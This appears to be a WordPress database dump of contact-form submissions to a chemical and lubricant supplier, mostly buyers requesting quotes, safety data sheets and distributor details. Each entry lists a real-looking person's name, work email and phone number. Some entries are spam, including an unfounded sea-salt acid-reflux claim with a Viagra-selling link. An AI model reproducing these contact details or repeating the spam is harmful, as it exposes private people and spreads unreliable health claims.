INSERT INTO `wp_postmeta` VALUES (34651, 3880, '_field_3', 'Do you feel the pain of acid reflux? Do you feel a fire inside your chest? Are you miserable? Are you ready for the issues to stop? Continue reading to find out how. Keep reading to learn to control acid reflux for good and to end the misery for good. \r\n \r\nYou may need to balance out hydrochloric acid amounts in your body if you want to reduce acid reflux and its symptoms. You can do this, for instance, by using sea salt rather than table salt. Sea salt has chloride and minerals that are good for the stomach and prevent acid. \r\n \r\n \r\n \r\n \r\n&lt;a href=&quot;https://www.viagrasansordonnancefr.com/acheter-sildenafil-pfizer-tapasztalatok/&quot; /&gt;https://www.viagrasansordonnancefr.com/acheter-sildenafil-pfizer-tapasztalatok/&lt;/a&gt;\r\n'); 
INSERT INTO `wp_postmeta` VALUES (34652, 3880, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34653, 3880, '_sub_id', '3880'); 
INSERT INTO `wp_postmeta` VALUES (34654, 3881, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34655, 3881, '_seq_num', '453'); 
INSERT INTO `wp_postmeta` VALUES (34656, 3881, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34657, 3881, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34658, 3881, '_field_1', 'Lorin Krueger'); 
INSERT INTO `wp_postmeta` VALUES (34659, 3881, '_field_10', 'Sailor Equipment'); 
INSERT INTO `wp_postmeta` VALUES (34660, 3881, '_field_2', 'lorin.krueger@sailorplastics.com'); 
INSERT INTO `wp_postmeta` VALUES (34661, 3881, '_field_8', '(507) 381-1445'); 
INSERT INTO `wp_postmeta` VALUES (34662, 3881, '_field_3', 'I would like to buy just 1 can of MS 475c for repair purposes on our circuit boards I have been unable to find a reseler/distributor please advise or sample me 1 can\r\n08 Maine Ave Adrian, MN 56110 \r\n\r\nThank you'); 
INSERT INTO `wp_postmeta` VALUES (34663, 3881, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34664, 3881, '_sub_id', '3881'); 
INSERT INTO `wp_postmeta` VALUES (34665, 3882, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34666, 3882, '_seq_num', '454'); 
INSERT INTO `wp_postmeta` VALUES (34667, 3882, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34668, 3882, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34669, 3882, '_field_1', 'JennoaLZ'); 
INSERT INTO `wp_postmeta` VALUES (34670, 3882, '_field_10', 'google'); 
INSERT INTO `wp_postmeta` VALUES (34671, 3882, '_field_2', 'kardio.tvister@yandex.ru'); 
INSERT INTO `wp_postmeta` VALUES (34672, 3882, '_field_8', '89675143521'); 
INSERT INTO `wp_postmeta` VALUES (34673, 3882, '_field_3', 'Zac Brown Band is an acclaimed nation vocalist, so don&#039;t miss the likelihood to visit &lt;a href=&quot;http://zacbrownbandtourconcerts.com/&quot; /&gt;zacbrownbandtourconcerts.com/&lt;/a&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34674, 3882, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34675, 3882, '_sub_id', '3882'); 
INSERT INTO `wp_postmeta` VALUES (34676, 3883, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34677, 3883, '_seq_num', '455'); 
INSERT INTO `wp_postmeta` VALUES (34678, 3883, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34679, 3883, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34680, 3883, '_field_1', 'Kathryn Hoyte'); 
INSERT INTO `wp_postmeta` VALUES (34681, 3883, '_field_10', 'Wesco Aircraft'); 
INSERT INTO `wp_postmeta` VALUES (34682, 3883, '_field_2', 'kathryn.hoyte@wescoair.com'); 
INSERT INTO `wp_postmeta` VALUES (34683, 3883, '_field_8', '(512) 519-3952'); 
INSERT INTO `wp_postmeta` VALUES (34684, 3883, '_field_3', 'To whom it may concern,\r\n\r\nI am trying to obtain a Dutch SDS for MS-122XD for UTAS Maastrict.\r\n\r\nThank you,\r\n\r\nKathryn Hoyte'); 
INSERT INTO `wp_postmeta` VALUES (34685, 3883, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34686, 3883, '_sub_id', '3883'); 
INSERT INTO `wp_postmeta` VALUES (34687, 3884, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34688, 3884, '_seq_num', '456'); 
INSERT INTO `wp_postmeta` VALUES (34689, 3884, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34690, 3884, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34691, 3884, '_field_1', 'Steve smith '); 
INSERT INTO `wp_postmeta` VALUES (34692, 3884, '_field_10', 'State industrial Supply '); 
INSERT INTO `wp_postmeta` VALUES (34693, 3884, '_field_2', 'steve@sisaz.com'); 
INSERT INTO `wp_postmeta` VALUES (34694, 3884, '_field_8', '(520) 744-0919'); 
INSERT INTO `wp_postmeta` VALUES (34695, 3884, '_field_3', 'We are looing for MS -260 AND MS122AD , where can we buy these?\n\nthanks '); 
INSERT INTO `wp_postmeta` VALUES (34696, 3884, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34697, 3884, '_sub_id', '3884'); 
INSERT INTO `wp_postmeta` VALUES (34698, 3885, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34699, 3885, '_seq_num', '457'); 
INSERT INTO `wp_postmeta` VALUES (34700, 3885, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34701, 3885, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34702, 3885, '_field_1', 'Kristy Sanchez'); 
INSERT INTO `wp_postmeta` VALUES (34703, 3885, '_field_10', 'TP Orthodontics, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (34704, 3885, '_field_2', 'kristy.sanchez@tportho.com'); 
INSERT INTO `wp_postmeta` VALUES (34705, 3885, '_field_8', '(800) 348-8856'); 
INSERT INTO `wp_postmeta` VALUES (34706, 3885, '_field_3', 'Hello,\nI’m in the process of updating our supplier database and need the following information for your company confirmed:\n \nContact Name:   \nContact E-mail:   \nContact Phone:  \nSupplier Address:  \n \nI would also like a copy of your ISO cert (if applicable) and Certificate of Liability Insurance, please.\n \nThank you so much for your help!\nKristy\n'); 
INSERT INTO `wp_postmeta` VALUES (34707, 3885, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34708, 3885, '_sub_id', '3885'); 
INSERT INTO `wp_postmeta` VALUES (34709, 3886, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34710, 3886, '_seq_num', '458'); 
INSERT INTO `wp_postmeta` VALUES (34711, 3886, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34712, 3886, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34713, 3886, '_field_1', 'Helen Valdez'); 
INSERT INTO `wp_postmeta` VALUES (34714, 3886, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (34715, 3886, '_field_2', 'helenrhae.valdez@unlv.edu'); 
INSERT INTO `wp_postmeta` VALUES (34716, 3886, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (34717, 3886, '_field_3', 'Hi,\r\n\r\nI would like to request an SDS for EPI-CURE Curing Agent W, CAS number 68479-98-1.\r\n\r\nThank you!'); 
INSERT INTO `wp_postmeta` VALUES (34718, 3886, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34719, 3886, '_sub_id', '3886'); 
INSERT INTO `wp_postmeta` VALUES (34720, 3887, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34721, 3887, '_seq_num', '459'); 
INSERT INTO `wp_postmeta` VALUES (34722, 3887, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34723, 3887, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34724, 3887, '_field_1', 'Paul Blundell'); 
INSERT INTO `wp_postmeta` VALUES (34725, 3887, '_field_10', 'Organix, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (34726, 3887, '_field_2', 'blundell@organixinc.com'); 
INSERT INTO `wp_postmeta` VALUES (34727, 3887, '_field_8', '(781) 932-4142'); 
INSERT INTO `wp_postmeta` VALUES (34728, 3887, '_field_3', 'I am interested in price and availability of Krytox (poly(perfluoropropylrnr glycol))  with carboxylic acid functionality that you supply. I read about Miller -Stephenson as a supplier in a RSC journal article. The krytox is reported to be about 6,000 g/mol but if you have specific specifications I would be interested to see them. I am looking for about 20 g of this polymer.'); 
INSERT INTO `wp_postmeta` VALUES (34729, 3887, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34730, 3887, '_sub_id', '3887'); 
INSERT INTO `wp_postmeta` VALUES (34731, 3888, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34732, 3888, '_seq_num', '460'); 
INSERT INTO `wp_postmeta` VALUES (34733, 3888, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34734, 3888, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34735, 3888, '_field_1', 'petr ruzicka'); 
INSERT INTO `wp_postmeta` VALUES (34736, 3888, '_field_10', 'dexta ca'); 
INSERT INTO `wp_postmeta` VALUES (34737, 3888, '_field_2', 'info@dextaca.com'); 
INSERT INTO `wp_postmeta` VALUES (34738, 3888, '_field_8', '(613) 478-5220'); 
INSERT INTO `wp_postmeta` VALUES (34739, 3888, '_field_3', 'Hello\r\nWould it be possible to obtain a current price list of you r epoxy resins and epoxy hardeners. ?\r\nThank you kindly\r\nPeter Ruzicka \r\nDexta ca.'); 
INSERT INTO `wp_postmeta` VALUES (34740, 3888, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34741, 3888, '_sub_id', '3888'); 
INSERT INTO `wp_postmeta` VALUES (34742, 3889, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34743, 3889, '_seq_num', '461'); 
INSERT INTO `wp_postmeta` VALUES (34744, 3889, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34745, 3889, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34746, 3889, '_field_1', 'ANIL BAJAJ'); 
INSERT INTO `wp_postmeta` VALUES (34747, 3889, '_field_10', 'PALMY FZE'); 
INSERT INTO `wp_postmeta` VALUES (34748, 3889, '_field_2', 'palmy@eim.ae'); 
INSERT INTO `wp_postmeta` VALUES (34749, 3889, '_field_8', '(971) 555-8190'); 
INSERT INTO `wp_postmeta` VALUES (34750, 3889, '_field_3', 'Dear Sirs\r\nWe are a trading based in Ajman UAE and have inquiry from  one of our client from Kuwait for the following Industrial oil &amp; lubricants, we request you to kindly send us your offer on fob basis along with product specification and msds.\r\n\r\nHi‐Tek R&amp;O 100	Industrial Oils Unlimited	Gallon	110\r\n(Note 1)	 	 	 \r\n 	 	 	 \r\nSyncomp P 46 	Industrial Oils Unlimited	Gallon	220\r\n(Note 1)	 	 	 \r\nHi‐Tek R&amp;O 46 (Note 1)	Industrial Oils Unlimited	Gallon	55\r\nSyngear HT 460 (Note 1)	Industrial Oils Unlimited	Gallon	55\r\nBarrier Buffer Fluid #5 (Note 1)	Industrial Oils Unlimited	Gallon	440\r\nSyncomp P 32 (Note 1)	Industrial Oils Unlimited	Gallon	110\r\nHi‐Tek R&amp;O 150	Industrial Oils Unlimited	Gallon	660\r\n(Note 1)	 	 	 \r\nSuperfilm Polyurea Grease	Industrial Oils Unlimited	KG	20\r\n(Note 1)	 	 	 \r\nCP-1516-100 (Note 1)	CPI Engineering Services	Gallon	2310\r\nISO VG  46 (Note 2)	-	Liter	416\r\nISO VG  46 (Note 3)	-	Liter	0\r\nNLGI Grade 2 (Note 4, 5)	BP ENER  LS2 or Shell alvania EP2 or Mobilux EP2	KG	18\r\nNLGI Grade 2 (Note 4, 5)	BP ESSO Unirex N 2 or Shell  Albida EP2 or Mobilith 5H100	KG	18\r\nNLGI Grade 2 (Note 4, 5)	BP ENER  LS2 or Shell alvania EP2 or Mobilux EP2	KG	0\r\nSAE 15W40 CF-4 , CG-4, or CH-4\r\n(Note 6, 8)	BP Vanellus Multi-Fleet or Shell Rotella T5 or 	Liter	416\r\n(Note 5)	Mobil Delvac MX EXTRA	 	0\r\nASTM D6210 (Note 5, 6)	GLYCOL (50% glycol, 50% water)-BP or SHELL or MOBIL	Liter	416\r\nISO VG 46 (Note 5)	BP Energol HPL-D-46 or Shell Tellus S46 or Mobil DTE25	Liter	0\r\nNLGI Grade 2 (Note 4, 5)	BP ENER  LS2 or Shell alvania EP2 or Mobilux EP2	KG	0\r\nISO VG 32 (Note 7)	-	Liter	416\r\nShell Gadus S2 V 100 3 (Note 4, 7)	Shell Gadus S2 V 100 3	KG	18\r\nISO VG 46 (Note 8)	TOTAL-PRESLIA GT 46 (Turbine Oil)	Cubic Meter	3\r\nSAE 15W-40, CE or CF-4	-	Gallon	275\r\nISO VG 68	Repsol Turbo Aries 68 or CEPSA Turbine EP 68 or	Liter	416\r\n 	BP-Oil Energol CS 68 or Shell Morlina 68 or	 	\r\n\r\n\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (34751, 3889, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34752, 3889, '_sub_id', '3889'); 
INSERT INTO `wp_postmeta` VALUES (34753, 3890, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34754, 3890, '_seq_num', '462'); 
INSERT INTO `wp_postmeta` VALUES (34755, 3890, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34756, 3890, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34757, 3890, '_field_1', 'Eddie'); 
INSERT INTO `wp_postmeta` VALUES (34758, 3890, '_field_10', 'Skuffmarx Skateboard &amp; Apparel'); 
INSERT INTO `wp_postmeta` VALUES (34759, 3890, '_field_2', 'eddie@skuffmarx.com'); 
INSERT INTO `wp_postmeta` VALUES (34760, 3890, '_field_8', '(818) 800-4209'); 
INSERT INTO `wp_postmeta` VALUES (34761, 3890, '_field_3', 'Hello my name is Eddie Correa With Skuffmarx Skateboards,\r\nI am looking for a manufacture to make speed cream or lubricant for Skate bearings.\r\nWhat can you recommend for us.\r\nWe are looking for 1/2 to 1 ounce bottles or tubes. \r\nBest regards,\r\nEddie'); 
INSERT INTO `wp_postmeta` VALUES (34762, 3890, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34763, 3890, '_sub_id', '3890'); 
INSERT INTO `wp_postmeta` VALUES (34764, 3892, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34765, 3892, '_seq_num', '463'); 
INSERT INTO `wp_postmeta` VALUES (34766, 3892, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34767, 3892, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34768, 3892, '_field_1', 'Harry Richard'); 
INSERT INTO `wp_postmeta` VALUES (34769, 3892, '_field_10', 'Acute marketing solutions Inc.'); 
INSERT INTO `wp_postmeta` VALUES (34770, 3892, '_field_2', 'harry@acutemarketingsolutions.com'); 
INSERT INTO `wp_postmeta` VALUES (34771, 3892, '_field_8', '(515) 861-6600'); 
INSERT INTO `wp_postmeta` VALUES (34772, 3892, '_field_3', 'Hello,\r\n\r\nI hope you are the right person to discuss about the Electronic Industry Database which includes complete contact details and verified email addresses of :-\r\n\r\nCEOs/presidents/VPs/MDs, Technical directors, Technical engineers, Design engineers, Quality engineers, Operations managers/directors, Project managers, R+D managers/directors, Sales managers/directors, Scientists, Electrical testing engineers, Aerospace engineers, Control engineers, Mechatronic engineers, Inspection engineers, System engineers, Hardware engineers, Directors of engineering, Development engineers, Heads of safety engineering, Senior manufacturing engineers and many more.\r\n\r\nIndustries: Data Center, Telecom, Medical and Health-care, Commercial, Industrial, Manufacturing, Residential, Mining, Oil and Gas, Aerospace and many more.\r\n\r\nKindly mention the parameters below so that I can run the counts, few free samples and other details for your reference.\r\n\r\nTarget Industry:\r\nTarget Job Title:\r\nTarget Geography:\r\n\r\nLook forward to your response.\r\n\r\nBest Regards,\r\nHarry Richard\r\nMarketing Manager'); 
INSERT INTO `wp_postmeta` VALUES (34773, 3892, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34774, 3892, '_sub_id', '3892'); 
INSERT INTO `wp_postmeta` VALUES (34775, 3893, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34776, 3893, '_seq_num', '464'); 
INSERT INTO `wp_postmeta` VALUES (34777, 3893, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34778, 3893, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34779, 3893, '_field_1', 'David Smith'); 
INSERT INTO `wp_postmeta` VALUES (34780, 3893, '_field_10', 'Aculides '); 
INSERT INTO `wp_postmeta` VALUES (34781, 3893, '_field_2', 'david@aculides.com'); 
INSERT INTO `wp_postmeta` VALUES (34782, 3893, '_field_8', '(515) 861-6600'); 
INSERT INTO `wp_postmeta` VALUES (34783, 3893, '_field_3', 'Good day,\r\n\r\nThis is David Smith from Aculides. I am reaching out to know about your current marketing initiatives and future programs regarding the products and services you offer.\r\n\r\nWe have collection of selective database of following job functions CEO CTO, COO, CFO, director of network operations, VP/director of asset management, VP or director of construction, engineering or outside plant, engineering manager, network engineer, network designer, procurement manager engineers, R&amp;D executives and technical experts and other key decision makers from these industries.\r\n \r\nThe sector from which they are included are Automotive, Battery assembly equipment, Hydrogen generation, Battery charging, Battery manufacturer, Component supplier, Consultant, Distributor, Education, Environmental, Financial services, Government, Material, Medical, Military, Portable electronics, Telecoms, Test equipment &amp; services, Utility &amp; renewable energy.\r\n\r\nKindly revert back with your requirements such as sectors, job functions you are looking for and we will run few samples for you.\r\n\r\nThank you for your time in advance.\r\n\r\nRegards,\r\nDavid Smith\r\nMarketing Manager \r\n'); 
INSERT INTO `wp_postmeta` VALUES (34784, 3893, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34785, 3893, '_sub_id', '3893'); 
INSERT INTO `wp_postmeta` VALUES (34786, 3894, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34787, 3894, '_seq_num', '465'); 
INSERT INTO `wp_postmeta` VALUES (34788, 3894, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34789, 3894, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34790, 3894, '_field_1', 'Lucas Wu'); 
INSERT INTO `wp_postmeta` VALUES (34791, 3894, '_field_10', 'Winova Pte Ltd'); 
INSERT INTO `wp_postmeta` VALUES (34792, 3894, '_field_2', 'lucas@winova.com.sg'); 
INSERT INTO `wp_postmeta` VALUES (34793, 3894, '_field_8', '(659) 127-6206'); 
INSERT INTO `wp_postmeta` VALUES (34794, 3894, '_field_3', 'Hi Sales,\r\n\r\nPlease assist to provide quotation for the following;\r\nMS-122 AD or MS-122 XD (DRY REL AGENT MS122AX- W/O 141B - BEST)'); 
INSERT INTO `wp_postmeta` VALUES (34795, 3894, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34796, 3894, '_sub_id', '3894'); 
INSERT INTO `wp_postmeta` VALUES (34797, 3895, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34798, 3895, '_seq_num', '466'); 
INSERT INTO `wp_postmeta` VALUES (34799, 3895, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34800, 3895, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34801, 3895, '_field_1', 'mike'); 
INSERT INTO `wp_postmeta` VALUES (34802, 3895, '_field_10', 'drs'); 
INSERT INTO `wp_postmeta` VALUES (34803, 3895, '_field_2', 'michael.myers@drs.com'); 
INSERT INTO `wp_postmeta` VALUES (34804, 3895, '_field_8', '(937) 306-3497'); 
INSERT INTO `wp_postmeta` VALUES (34805, 3895, '_field_3', 'do you have a data sheet for MS-470N or MS470N?\nwhat is there replacement? \n'); 
INSERT INTO `wp_postmeta` VALUES (34806, 3895, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34807, 3895, '_sub_id', '3895'); 
INSERT INTO `wp_postmeta` VALUES (34808, 3896, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34809, 3896, '_seq_num', '467'); 
INSERT INTO `wp_postmeta` VALUES (34810, 3896, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34811, 3896, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34812, 3896, '_field_1', 'Robert Cowles'); 
INSERT INTO `wp_postmeta` VALUES (34813, 3896, '_field_10', 'Wesco Aircraft'); 
INSERT INTO `wp_postmeta` VALUES (34814, 3896, '_field_2', 'Robert.Cowles@Wescoair.com'); 
INSERT INTO `wp_postmeta` VALUES (34815, 3896, '_field_8', '(512) 279-4070'); 
INSERT INTO `wp_postmeta` VALUES (34816, 3896, '_field_3', 'Good morning,\r\nI am writing to determine the availability of your MS-143H.  I understand that it was being phased out but I wanted to determine if there was any stock left at this point.  Secondly, I wanted to verify that the replacement is the MS-143TE.  Thank you for your help.\r\n\r\nRegards,\r\nRobert Cowles'); 
INSERT INTO `wp_postmeta` VALUES (34817, 3896, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34818, 3896, '_sub_id', '3896'); 
INSERT INTO `wp_postmeta` VALUES (34819, 3897, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34820, 3897, '_seq_num', '468'); 
INSERT INTO `wp_postmeta` VALUES (34821, 3897, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34822, 3897, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34823, 3897, '_field_1', 'Rich Hawkins'); 
INSERT INTO `wp_postmeta` VALUES (34824, 3897, '_field_10', 'Parker Hannifin'); 
INSERT INTO `wp_postmeta` VALUES (34825, 3897, '_field_2', 'Rhawkins@parker.com'); 
INSERT INTO `wp_postmeta` VALUES (34826, 3897, '_field_8', '(440) 366-1229'); 
INSERT INTO `wp_postmeta` VALUES (34827, 3897, '_field_3', 'I need an MSDS sheet on conformal coating, MS-475C.  Thanks'); 
INSERT INTO `wp_postmeta` VALUES (34828, 3897, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34829, 3897, '_sub_id', '3897'); 
INSERT INTO `wp_postmeta` VALUES (34830, 3898, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (34831, 3898, '_seq_num', '255'); 
INSERT INTO `wp_postmeta` VALUES (34832, 3898, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34833, 3898, '_field_12', 'Sterling Girard'); 
INSERT INTO `wp_postmeta` VALUES (34834, 3898, '_field_13', 'Jamaica Bearings PPD'); 
INSERT INTO `wp_postmeta` VALUES (34835, 3898, '_field_18', 'n/a'); 
INSERT INTO `wp_postmeta` VALUES (34836, 3898, '_field_14', 'sgirard@jamaicabearings.com'); 
INSERT INTO `wp_postmeta` VALUES (34837, 3898, '_field_15', '(805) 484-2323'); 
INSERT INTO `wp_postmeta` VALUES (34838, 3898, '_field_16', 'On your CofC for KRYTOX products it states Miller Stephenson warranty 2 years from date of shipment. On the (Krytox) container it says indefinite if unopened. What is the expiration date for this product once opened? Thank you. '); 
INSERT INTO `wp_postmeta` VALUES (34839, 3898, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (34840, 3898, '_sub_id', '3898'); 
INSERT INTO `wp_postmeta` VALUES (34841, 3899, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34842, 3899, '_seq_num', '469'); 
INSERT INTO `wp_postmeta` VALUES (34843, 3899, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34844, 3899, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34845, 3899, '_field_1', 'John Francis'); 
INSERT INTO `wp_postmeta` VALUES (34846, 3899, '_field_10', 'NASA Goddard Space Flight Center'); 
INSERT INTO `wp_postmeta` VALUES (34847, 3899, '_field_2', 'John.J.Francis@nasa.gov'); 
INSERT INTO `wp_postmeta` VALUES (34848, 3899, '_field_8', '(301) 286-2665'); 
INSERT INTO `wp_postmeta` VALUES (34849, 3899, '_field_3', 'Looking to purchase some Krytox lubricants.\r\n\r\n1531XP Oil - small container, only need about 100cc\r\nXP 2A6 grease - 2 oz. tube\r\n'); 
INSERT INTO `wp_postmeta` VALUES (34850, 3899, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34851, 3899, '_sub_id', '3899'); 
INSERT INTO `wp_postmeta` VALUES (34852, 3900, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34853, 3900, '_seq_num', '470'); 
INSERT INTO `wp_postmeta` VALUES (34854, 3900, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34855, 3900, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34856, 3900, '_field_1', 'Gonzalo Núñez'); 
INSERT INTO `wp_postmeta` VALUES (34857, 3900, '_field_10', 'Universidad Técnica Federico Santa María'); 
INSERT INTO `wp_postmeta` VALUES (34858, 3900, '_field_2', 'gonzalo.nunezm@usm.cl'); 
INSERT INTO `wp_postmeta` VALUES (34859, 3900, '_field_8', '(562) 303-7303'); 
INSERT INTO `wp_postmeta` VALUES (34860, 3900, '_field_3', 'For whom it may concern:\r\n\r\nI&#039;d like to buy one of your products (PTFE Release Agent Dry Lubricant) but I&#039;m in Chile. Do you have a distributor or dealer in my country?\r\nThank you very much in advance. '); 
INSERT INTO `wp_postmeta` VALUES (34861, 3900, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34862, 3900, '_sub_id', '3900'); 
INSERT INTO `wp_postmeta` VALUES (34863, 3901, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (34864, 3901, '_seq_num', '256'); 
INSERT INTO `wp_postmeta` VALUES (34865, 3901, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34866, 3901, '_field_12', 'Joline Higginbothom'); 
INSERT INTO `wp_postmeta` VALUES (34867, 3901, '_field_13', 'Industrial Technical Services Co'); 
INSERT INTO `wp_postmeta` VALUES (34868, 3901, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (34869, 3901, '_field_14', 'joline@itsco.biz'); 
INSERT INTO `wp_postmeta` VALUES (34870, 3901, '_field_15', '(626) 926-4212'); 
INSERT INTO `wp_postmeta` VALUES (34871, 3901, '_field_16', 'Please quote me for Krytox 226 FG Grease 44.09lbs/20.0KG  Pail. \r\n\r\nThank you in Advance\r\n\r\nJoline Higginborthom\r\nSales Manager'); 
INSERT INTO `wp_postmeta` VALUES (34872, 3901, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (34873, 3901, '_sub_id', '3901'); 
INSERT INTO `wp_postmeta` VALUES (34874, 3902, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34875, 3902, '_seq_num', '471'); 
INSERT INTO `wp_postmeta` VALUES (34876, 3902, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34877, 3902, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34878, 3902, '_field_1', 'GUO RAN'); 
INSERT INTO `wp_postmeta` VALUES (34879, 3902, '_field_10', 'TEXAS TRANSACTOR'); 
INSERT INTO `wp_postmeta` VALUES (34880, 3902, '_field_2', 'GUOR1001@TEXASTRANSACTOR.COM'); 
INSERT INTO `wp_postmeta` VALUES (34881, 3902, '_field_8', '(361) 946-6098'); 
INSERT INTO `wp_postmeta` VALUES (34882, 3902, '_field_3', 'Please quote: MS-907, 5PCs'); 
INSERT INTO `wp_postmeta` VALUES (34883, 3902, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34884, 3902, '_sub_id', '3902'); 
INSERT INTO `wp_postmeta` VALUES (34885, 3903, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34886, 3903, '_seq_num', '472'); 
INSERT INTO `wp_postmeta` VALUES (34887, 3903, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34888, 3903, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
